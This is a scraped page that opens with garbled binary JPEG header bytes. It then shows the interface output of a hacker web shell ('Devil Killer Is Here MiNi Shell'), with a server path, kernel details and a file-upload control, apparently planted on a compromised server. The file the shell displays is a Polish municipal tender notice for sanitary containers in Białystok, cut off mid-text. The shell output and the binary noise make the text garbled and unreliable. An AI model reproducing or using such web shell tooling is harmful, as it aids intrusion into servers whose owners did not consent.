JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250331/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250331/0016980701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa kontenerów sanitarnych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Mienia Komunalnego w Białymstoku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 200241074</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. gen. Józefa Bema 89/1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-370</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zmk.bialystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zmk.bialystok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa kontenerów sanitarnych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-874d26b0-ad5e-410d-8b3e-fe477a7c3f10</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00169807</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00037137/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa kontenerów sanitarnych na potrzeby TM.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zmk.bialystok.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zmk-bialystok.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>3) Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>4) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Wymagania organizacyjne:<br/>W postępowaniu o udzielenie zamówienia publicznego komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu<br/>Platformy zakupowej, która jest dostępna pod adresem https://zmkbialystok.ezamawiajacy.pl.<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym:<br/>- składanie ofert,<br/>- wymiana informacji,<br/>- przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, odbywa się przy użyciu środków komunikacji<br/>elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji<br/>elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2024 r. poz. 1513<br/>ze zm.).<br/>Zamawiający nie przewiduje sposobu komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta wykonawcy i załączniki do oferty) odbywa<br/>się elektronicznie za pośrednictwem Platformy Zakupowej „Moduł korespondencji”. Korespondencja przesłana za pomocą tego<br/>formularza nie może być szyfrowana. W korespondencji kierowanej do zamawiającego wykonawcy powinni posługiwać się numerem<br/>przedmiotowego postępowania.<br/>Zamawiający wymaga, aby wykonawca podał w Formularzu ofertowym lub innych dokumentach lub oświadczeniach adres emailowy<br/>do korespondencji ten sam, który jest adresem do kontaktów wpisanym w Platformie.<br/>Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej, e-mail: zp@zmk.bialystok.pl.<br/>- zgłoszenie do postępowania wymaga zalogowania wykonawcy do Systemu na subdomenie ZMK Białystok<br/>https://zmkbialystok.ezamawiajacy.pl lub https://oneplace.marketplanet.pl,<br/>- wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego, podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”,<br/>- po potwierdzeniu adresu e-mail należy się zalogować za pomocą przycisku „Zaloguj” w celu ukończenia procesu rejestracji,<br/>- po wpisaniu loginu i hasła należy użyć przycisku „Zaloguj się”, a po zalogowaniu się należy wybrać zakładkę „Rejestracja”,<br/>- po wypełnieniu formularza rejestracyjnego podzielonego na cztery etapy należy wysłać wniosek rejestracyjny do weryfikacji za<br/>pomocą przycisku „Wyślij wniosek”. Kod pocztowy w formularzu powinien być wpisany w formacie XX-XXX natomiast numer<br/>NIP/PESEL oraz numery telefonów jako ciąg cyfr (bez myślnika lub spacji między cyframi),<br/>- wiadomość potwierdzająca aktywację konta zostanie przesłana na adres e- mail użyty podczas rejestracji w ciągu 6 godzin<br/>roboczych od przesłania wniosku do akceptacji. Jeżeli niezbędna jest szybsza weryfikacja wniosku, istnieje możliwość kontaktu z<br/>infolinią wsparcia (22 257 22 23) z prośbą o przyspieszenie weryfikacji wniosku rejestracyjnego. Infolinia jest czynna w dni robocze<br/>od godziny 9:00 do 17:00,<br/>- po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, są<br/>zamieszczone na stronie https://zmk-bialystok.ezamawiajacy.pl w zakładce „Baza wiedzy” i w załączniku nr 5 do SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Rozdział II. Ochrona danych osobowych.<br/>1. Realizując przepisy Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwanego dalej „RODO” oraz uwzględniając wymagania<br/>określone w art. 19 ust. 1 ustawy z dnia 11 września</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2024 r. poz. 1320), zwanej dalej także „ustawą”, zamawiający informuje o<br/>zasadach przetwarzania danych wykonawcy lub osób po stronie wykonawcy oraz o przysługujących prawach z tym związanych:<br/>1) administratorem Państwa danych osobowych jest:<br/>Zarząd Mienia Komunalnego w Białymstoku z siedzibą przy ul. gen. J. Bema 89/1, 15-370 Białystok, tel. 85.74-79-430, kontakt z<br/>inspektorem ochrony danych w Zarządzie Mienia Komunalnego<br/>w Białymstoku, możliwy jest pod nr tel. + 48 85.74-79-433 lub adresem e-mail: lukasz.zak@zmk.bialystok.pl; oraz spółka Otwarty<br/>Rynek Elektroniczny S.A. siedzibą w Warszawie<br/>(02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez<br/>Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS:<br/>0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Zarząd Mienia Komunalnego<br/>w Białymstoku prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem:<br/>https://zmkbialystok.ezamawiajacy.pl,<br/>2) administrator wyznaczył Inspektora Danych Osobowych, adres e-mail: lukasz.zak@zmk.bialystok.pl,<br/>Szczegółowe informacje dotyczące Inspektora Ochrony Danych znajdują się na stronie internetowej<br/>https://www.zmk.bialystok.pl/index.php?go=rodo oraz w miejscu publicznie dostępnym w siedzibie zamawiającego,<br/>3) Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z niniejszym postępowaniem o udzielenie zamówienia publicznego,<br/>4) odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy Pzp,<br/>5) Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza<br/>4 lata, okres przechowywania obejmuje cały czas trwania umowy (art. 78 ust. 4 ustawy Pzp),<br/>6) obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest wymogiem określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w niniejszym postępowaniu,<br/>7) w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do<br/>postanowień art. 22 RODO,<br/>8) posiadają Państwo:<br/>a) zgodnie z art. 15 RODO - prawo dostępu do danych osobowych Państwa dotyczących<br/>(z zastrzeżeniem, że w sytuacji, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego<br/>wysiłku, mogą Państwo zostać zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia),<br/>b) zgodnie z art. 16 RODO - prawo do sprostowania Państwa danych osobowych (z tym, że skorzystanie z prawa do sprostowania<br/>nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu z postępowania oraz załączników do niego),<br/>Szczegółowe informacje znajdują się w SWZ Rozdział III. Ochrona danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZ.JO.26.3.28.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa kontenerów sanitarnych.<br/>2.	Charakterystyka użytkowa:<br/>1)	obiekty całoroczne ocieplone, zgodne z normami WT 2021 (warunkami tech. dla budynków w zakresie parametrów przenikalności cieplnej i wymagań pożarowych określonych w ustawie Prawo bud.),<br/>2)	wersja wykończenia: „pod klucz” (obiekt gotowy do użycia po posadowieniu i przyłączeniu bezp. do zew. sieci elektrycznej i wodno-kanali.) bez dodatkowego montażu instalacji.<br/>3.	KONTENER NR 1 - DAMSKI:<br/>1)	rozmiar obiektu:<br/>a)	dł. x szer.: nie mniej niż 590 x 240 cm, <br/>b)	wys. zewnętrzna: min 280 cm,<br/>c)	wys. wnętrza: min 240 cm (w najniższym punkcie),<br/>2)	konstrukcja stalowa:<br/>a)	rama spawana z kształtowników stalowych o grubości min 4mm,<br/>b)	słupy: kształtowniki stalowe o grubości min 4mm spawane lub skręcane do ramy górnej i dolnej,<br/>c)	podłoga kontenera wykonana z kształtowników stalowych, dodatkowo wzmocniona, usztywniona,<br/>d)	kostki do transportu HDS,<br/>e)	malowanie: farba antykorozyjna - kolor do ustalenia,<br/>3)	ściany:<br/>a)	płyta warstwowa - kolor do ustalenia,<br/>b)	izolacja: wełna mineralna, styropian lub PIR - spełniająca normy WT 2021,<br/>c)	ściany wew.e powierzchnia gładka, płyta meblowa - kolor do ustalenia,<br/>4)	dach:<br/>a)	płyta warstwowa - kolor do ustalenia,<br/>b)	Kąt spadku min. 1%,<br/>c)	izolacja: wełna mineralna, styropian, lub PIR - spełniająca normy WT 2021,<br/>d)	odprowadzenie wody deszczowej rynnami obwiedniowymi w ramie kontenera z rurami spustowymi w słupach narożnych obróbki zewn. z powlekanej blachy trapezowej ocynkowanej, dopuszczalne orynnowanie zewn.<br/>5)	podłoga:<br/>a)	płyta podłogowa cementowo wiórowa min. 20mm,<br/>b)	wykładzina PCV - min. 2mm o wysokim stopniu odporności na ścieranie,<br/>c)	izolacja: wełna mineralna, lub PIR- spełniająca normy WT 2021, <br/>6)	stolarka:<br/>a)	1 szt. okno PCV o wym. min. 560 mm x 530 mm, uchylne, min. trzyszybowe - spełniająca normy WT 2021,<br/>b)	1 szt. okno PCV o wymiarach min. 400 mm x 600 mm, uchylne, min. trzyszybowe - spełniająca normy WT 2021,<br/>c)	1 szt. drzwi zew. stalowe pełne ocieplane - spełniająca normy WT 2021 o rozmiarze min. 90 cm x 200 cm; lewe - otwierane na zew. W zestawie: klamka, zamek, trzy komplety kluczy, zamontowane samozamykacze. Kolor do ustalenia. Tabliczka graficzna na zew. drzwiach wejściowych z informacją o toalecie dla kobiet,<br/>7)	instalacja elektryczna:<br/>a)	instalacja elektryczna jednofazowa kryta, dopuszczalna natynkowa w kanałach elektroinstalacyjnych PCV,<br/>b)	lampy LED min. 25 W - w każdym pomieszczeniu, sufitowe, z włącznikami światła umiejscowionymi przy zewnętrznych drzwiach wejściowych, w kabinach lampy LED na czujnik ruchu,<br/>c)	min. 3 szt. gniazdo 230 V (usytuowane w miejscach do zasilania grzejnika, podgrzewcza wody, suszarki do rąk),<br/>d)	rozdzielnica elektryczna z wyposażeniem (wyłącznik RCD, bezpieczniki B10 do oświetlenia LED i B16 do zasilania podgrzewacza wody, grzejników elektrycznych, suszarek),<br/>8)	wyposażenie sanitarne i inne:<br/>a)	4 szt. kabina przedzielona ścianką giszetową z HPL (ścianki zaopatrzone w okucia, gałki, blokady od wew. i zew. z odpowiednią sygnalizacją, nóżki oraz zawiasy, po min. 1 wieszaku na odzież w kabinie. Okucia ze stali nierdzewnej, aluminium lub poliamidu) w tym jedna kabina zamykana na klucz,<br/>b)	4 szt. zestaw podtynkowy WC z deską,<br/>c)	4 szt. pojemnik na papier toaletowy, średnica papieru do 23 cm, stal matowa, typu Merida Stella Maxi lub równoważny,<br/>d)	2 szt. umywalka dwustanowiskowa biała z konglomeratu, ścienna/wisząca,<br/>e)	min. 4 szt. bateria umywalkowa bezdotykowa sensor fotokomórka lub bateria czasowa,<br/><br/>4.	KONTENER NR 2 - MĘSKI:<br/>1)	rozmiar obiektu:<br/>a)	dł. x szerokość: nie mniej niż 590 x 240 cm, <br/>b)	wys. zew.: min 280 cm,<br/>c)	wys. wn.: min. 240 cm (w najniższym punkcie),<br/>2)	konstrukcja stalowa:<br/>a)	rama spawana z kształtowników stalowych o grubości min 4 mm,<br/>b)	słupy: kształtowniki stalowe o grubości min 4mm spawane lub skręcane do ramy górnej i dolnej,<br/>c)	podłoga kontenera wykonana z kształtowników stalowych, dodatkowo wzmocniona, usztywniona,<br/>d)	kostki do transportu HDS,<br/>e)	malowanie: farba antykorozyjna - kolor do ustalenia,<br/>3)	ściany:<br/>a)	płyta warstwowa - kolor do ustalenia,<br/>b)	izolacja: wełna mineralna, styropian lub PIR - spełniająca normy WT 2021,<br/>c)	ściany wew. powierzchnia gładka - płyta meblowa - kolor do ustalenia,<br/>4)	dach:<br/>a)	płyta warstwowa - kolor do ustalenia,<br/>b)	kąt spadku min. 1%,<br/>c)	izolacja: wełna mineralna, styropian, lub PIR - spełniająca normy WT 2021,<br/>d)	odprowadzenie wody deszczowej rynnami obwiedniowymi w ramie kontenera z rurami spustowymi w słupach narożnych obróbki zew. z powlekanej blachy trapezowej ocynkowanej, dopuszczalne orynnowanie zewnętrzne,<br/>5)	podłoga:<br/>a)	płyta podłogowa cementowo wiórowa min 20 mm.,<br/>b)	wykładzina PCV – min. 2mm o wysokim stopniu odporności na ścieranie,<br/>c)	izolacja: wełna mineralna, lub PIR- spełniająca normy WT 2021, <br/>6)	stolarka:<br/>a)	1 szt. okno PCV o wymiarach min 560 mm x 530 mm, uchylne, min. trzyszybowe - spełniająca normy WT 2021,<br/>b)	1 szt. okno PCV o wymiarach min. 400 mm x 600 mm, uchylne, min. trzyszybowe - spełniająca normy WT 2021,<br/>c)	1 szt. drzwi zewnętrzne stalowe pełne ocieplane - spełniająca normy WT 2021 o rozmiarze min. 90 cm x 200 cm; lewe - otwierane na zewnątrz. W zestawie: klamka, zamek, trzy komplety kluczy, zamontowane samozamykacze. Kolor do ustalenia. Tabliczka graficzna na zew.drzwiach wejściowych z informacją o toalecie dla mężczyzn,<br/>7)	instalacja elektryczna:<br/>a)	instalacja elektryczna jednofazowa kryta, dopuszczalna natynkowa w kanałach elektroinstalacyjnych PCV,<br/>b)	lampy LED min. 25W - w każdym pomieszczeniu, sufitowe, z włącznikami światła umiejscowionymi przy zewnętrznych drzwiach wejściowych, w kabinach lampy LED na czujnik ruchu,<br/>c)	min. 3 szt. gniazdo 230V (usytuowane w miejscach do zasilania grzejnika, podgrzewcza wody, suszarki do rąk),<br/>d)	rozdzielnica elektryczna z wyposażeniem (wyłącznik RCD, bezpieczniki B10 do oświetlenia LED <br/>i B16 do zasilania podgrzewacza wody, grzejników elektrycznych, suszarek),<br/>8)	wyposażenie sanitarne i inne:<br/>a)	wydzielone pomieszczenie gospodarcze, zamykane na klucz, z 1 szt. - zawór czerpalny (podłączony do instalacji z zimną wodą) - do pobierania wody do wiadra lub podłączenia węża ogrodowego,<br/>b)	3 szt. kabina przedzielona ścianką giszetową z HPL (ścianki zaopatrzone w okucia, gałki, blokady od wewnątrz i zewnątrz z odpowiednią sygnalizacją, nóżki oraz zawiasy, po min. 1 wieszaku na odzież w kabinie. Okucia ze stali nierdzewnej, aluminium lub poliamidu), w tym jedna kabina zamykana na klucz, <br/>c)	3 szt. zestaw podtynkowy WC z deską,<br/>d)	3 szt. pojemnik na papier toaletowy, średnica papieru do 23 cm, stal matowa, typu Merida Stella Maxi lub równoważny,<br/>e)	3 szt. pisuar biały z zaworem spłukującym przedzielony ścianką giszetową w kolorze do ustalenia,<br/>f)	min. 1 szt. umywalka dwustanowiskowa biała z konglomeratu, ścienna/wisząca,<br/><br/>5.	KONTENER NR 3 - DLA OSÓB NIEPEŁNOSPRAWNYCH:<br/>1)	rozmiar obiektu:<br/>a)	długość x szer.: nie mniej niż 280 x 240 cm, <br/>b)	wys. zew.: min 280 cm,<br/>c)	wys. wnętrza: min 240 cm (w najniższym punkcie),<br/>2)	konstrukcja stalowa:<br/>a)	rama spawana z kształtowników stalowych o grubości min. 4mm,<br/>b)	-słupy: kształtowniki stalowe o grubości min. 4mm spawane lub skręcane do ramy górnej i dolnej,<br/>c)	podłoga kontenera wykonana z kształtowników stalowych, dodatkowo wzmocniona, usztywniona, <br/>d)	kostki do transportu HDS,<br/>e)	malowanie: farba antykorozyjna - kolor do ustalenia,<br/>f)	podjazd umożliwiający wjazd wózkiem inwalidzkim (spocznik, kąt nachylenia 15-30 cm), <br/>3)	ściany:<br/>a)	płyta warstwowa - kolor do ustalenia,<br/>b)	izolacja: wełna mineralna, styropian lub PIR - spełniająca normy WT 2021,<br/>c)	ściany wewnętrzne powierzchnia gładka- płyta meblowa - kolor do ustalenia,<br/>4)	dach:<br/>a)	płyta warstwowa - kolor do ustalenia,<br/>b)	kąt spadku min 1%,<br/>c)	izolacja: wełna mineralna, styropian, lub PIR - spełniająca normy WT 2021,<br/>d)	odprowadzenie wody deszczowej rynnami obwiedniowymi w ramie kontenera z rurami spustowymi w słupach narożnych obróbki zewnętrzne z powlekanej blachy trapezowej ocynkowanej, możliwe orynnowanie zewnętrzne,<br/>5)	podłoga:<br/>a)	płyta podłogowa cementowo wiórowa min 20 mm.,<br/>b)	wykładzina PCV – min. 2mm o wysokim stopniu odporności 